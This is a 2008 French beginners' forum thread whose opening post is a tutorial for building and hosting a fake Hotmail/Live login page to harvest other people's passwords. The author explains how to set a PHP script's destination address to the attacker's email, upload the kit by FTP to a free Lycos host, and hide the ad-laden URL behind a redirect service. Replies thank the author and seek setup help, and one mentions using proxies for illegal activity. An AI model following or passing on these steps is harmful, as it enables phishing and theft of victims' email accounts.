Info37 Index du Forum
Info37
Débutant en informatique? Ce forum est fait pour vous, vous y apprendrez ici tout ce que nous serons en mesure de vous apprendre .

Info37 Index du ForumFAQRechercherS’enregistrerConnexion

:: Phishing , ou comment recuperer des mots de passes ::

Poster un nouveau sujet   Répondre au sujet    Info37 Index du Forum -> Info37 -> Corbeille -> Hacking & Secure -> Chasse aux mot de passe
Sujet précédent :: Sujet suivant  
Auteur Message
regedit
Invité

MessagePosté le: Sam 31 Mai - 11:04 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

Moi Regedit , pour Info37 :

LE PHISHING

I ) Présentation du phishing

2) Créer sa fausse page...

3) ...Et la Mettre en ligne

I) PRÉSENTATION DU PHISHING:

"
  • Le phishing fait parti des nouvelles menaces que l'on peut rencontrer sur le net

Le phishing ( mot anglais « fishing », en français pêche, et « phreaking », désignant le piratage de lignes téléphoniques), traduit en « hameçonner », est une technique utilisée par les pirates informatiques pour récupérer des informations auprès d'internautes.
  • La technique du phishing exploite non pas une faille informatique mais la « faille humaine » en dupant les internautes par le biais d'un courrier électronique
  • Le mail envoyé par ces pirates vous informe que vous devez vous soumettre à la vérification ou la mise à jour de vos données personnelles. Souvent pour des raisons de sécurité ou encore votre réinscription à un service !
  • Le mail vous invite à cliquer sur un lien hypertexte supposé vous diriger sur (banque, site de commerce etc). Mais, en réalité, vous arrivez sur un leurre ! Le site imite en tout point celui que vous connaissez : même design, même logo, mêmes couleurs. Les pirates vous demandent alors de leur communiquer votre numéro de carte bancaire, un code confidentiel ou toute autre donnée sensible .
  • Grâce à ces données les pirates sont capables de réaliser des virements ou des achats.
"

Nous nous allons pas essayer d'arnaquer des assurées , ni des clients de banques ou quoi que se soit.

Nous allons tout simplement créer une fausse page mail , pour récupérer des mots de passe hotmail .

2) Création de la fausse page .

Récupérer le fichier " SITE MSN " en vous rendant sur mon site-perso : Aller dans "fichier" et cliquer sur " SITE MSN "
Une fois ce dossier récupérer , décompresser "login live.com "
Rendez vous donc dans "login live.com " et éditez "script.php "

Donc a la place de

Code:

$dest="VOTREADRESSEMAIL"; 

vous mettez par exemple pour moi ( verajor@hotmail.fr )

Code:

$dest="verajor@hotmail.fr";  

Une fois le script éditez , vous n'avez plus qu'a mettre en ligne le dossier "login live.com "

3) LA MISE EN LIGNE

Pour ce qui n'ont jamais ouvert de site web , c'est la que sa se corse

Pour résumer dans cet 3eme partie nous allons mettre sur la toile "login live .com " ce qui va donner ceci pour mon site :
[url:5798d738d7=http://membres.lycos.fr/wlmacountservice/login.live.com/]http://membres.lycos.fr/wlmacountservice/login.live.com/[/url:5798d738d7]

- Rendez vous sur http://www.multimania.lycos.fr/
et ouvrez un compte , une fois votre compte lycos activez , vous avez deux choix pour mettre en ligne "login live.com "

la plus simple : utiliser filezilla
télécharger , installer et ouvrez filezilla dans hote tapez " ftp.membres.lycos.fr
dans utilisateur " votre_nom_d'utilisateur" (le nom que vous avez taper a votre inscription sur lycos )
dans mot de passe : "votre_mot_de_passe" (le mdp que vous avez taper a votre inscription sur lycos )
dans port : "21"

ensuite transferez votre dossier "loginlive.com" sur "site distant"

voila votre site est en ligne , pour le voir rendez vous sur " http://membres.lycos.fr/votre_nom_d'utilisateur"

- La seconde technique consiste a utiliser le logiciel de lycos "web-ftp" sauf que c'est long et il faut recréer l'arborescence a la main.

-- Mais une fois votre site ne ligne vous remarquerez que vous avez de la pub , donc pour récupérer un mdp ,sa le fait pas , et bien il existe une technique : c'est la redirection : rendez vous sur http://redirection.c.la/
ou sur http://new.fr

et suivez les instructions pour redirigez votre site.

Voila si vous avez tous suivi et fait comme dans ce tuto , vous devriez avoir une fausse page web hotmail.
/!\ Toutes ces informations ne sont qu'a titre d'exemple , en aucun cas ni moi ni ce forum ne seront tenu pour responsable si vous les utilisez a mauvais escient.

Publicité

MessagePosté le: Sam 31 Mai - 11:04 (2008)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
yasuke
Surfer
Surfer

France XP Firefox
Années d'experiences sur le net: 0

MessagePosté le: Dim 1 Juin - 13:47 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

Merci pour le tuto regedit mai lord de ma conection a ftp.membres.lycos.fr il me dit qu'il ne peuit pa me connecté au serveur je ne comprend pa pk je ne peut donc pas acceder a la page de lycos et du ftp :'(

KeepSmile
Invité

MessagePosté le: Dim 1 Juin - 19:02 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

Un tutoriel !!!

J'avais complètement oublié

Eh bien en tout cas merci beaucoup de t'occuper ainsi du forum regedit Gros sourire

Je devrai moi aussi écrire un petit peu cette semaine... La partie Hardware semble vide...

isoltic
Invité

MessagePosté le: Lun 2 Juin - 15:09 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

Oo quelle jolie tuto regedit g g

KeepSmile
Invité

MessagePosté le: Lun 2 Juin - 17:16 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

Hey, salut Isoltic, je ne t'ai aps vu depuis un petit moment (deux fois sur msn...)

isoltic
Invité

MessagePosté le: Lun 2 Juin - 18:17 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

Bien pour tan je poste régulierment sur le forum

yasuke
Surfer
Surfer

France XP Firefox
Années d'experiences sur le net: 0

MessagePosté le: Lun 2 Juin - 20:54 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

qu'elle qu'un aurai une solution a mon problem sité ci dessu

KeepSmile
Invité

MessagePosté le: Lun 2 Juin - 23:28 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

yasuke a écrit:
Merci pour le tuto regedit mai lord de ma conection a ftp.membres.lycos.fr il me dit qu'il ne peuit pa me connecté au serveur je ne comprend pas pk je ne peut donc pas acceder a la page de lycos et du ftp :'(

Je n'utilise jamais de proxy, sauf si je fait des choses pas trop légal, où on peut éventuellement se faire choper... Désolé, je ne sais pas me servir de ce système, impossible de t'aider, donc.

coyotus
Apprenti Graphiste
Apprenti Graphiste

Années d'experiences sur le net: 10

MessagePosté le: Ven 27 Juin - 17:22 (2008)    Sujet du message: Phishing , ou comment recuperer des mots de passes Répondre en citant

dommage que la pub gache tout.
j'ai quelques modele pour des jeux en ligne que j'ai créer pour m'exercer.

Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 11:50 (2017)    Sujet du message: Phishing , ou comment recuperer des mots de passes

Poster un nouveau sujet   Répondre au sujet    Info37 Index du Forum -> Info37 -> Corbeille -> Hacking & Secure -> Chasse aux mot de passe Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

Sauter vers:  

Index | Creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Informatique37 ©
Theme : Staff of Info37